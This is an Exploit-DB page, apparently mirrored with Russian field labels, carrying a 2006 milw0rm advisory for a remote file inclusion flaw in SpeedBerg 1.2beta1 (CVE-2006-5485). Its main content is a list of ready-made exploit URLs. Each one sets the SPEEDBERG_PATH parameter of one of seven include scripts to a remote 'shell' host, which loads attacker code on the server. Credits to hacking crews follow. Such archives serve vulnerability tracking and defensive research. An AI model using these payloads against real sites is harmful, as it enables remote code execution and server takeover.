Exploit SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion

[Exploiter]

EDB-ID

2615

Проверка EDB

1. Пройдено

Автор

K1TK4T

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-5485

Дата публикации

2006-10-22

########################################################################
# speedberg <= 1.2beta1  Remote File Inclusion
# Download Source :
http://www.myepfl.ch/speedberg/files/speedberg-1.2beta1.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
file;
entrancePage.tpl.php
generalToolBox.tlb.php
myToolBox.tlb.php
scriplet.inc.php
simplePage.tpl.php
speedberg.class.php
standardPage.tpl.php
########################################################################
exploit;
http://localhost/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=http://shell
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]

# milw0rm.com [2006-10-22]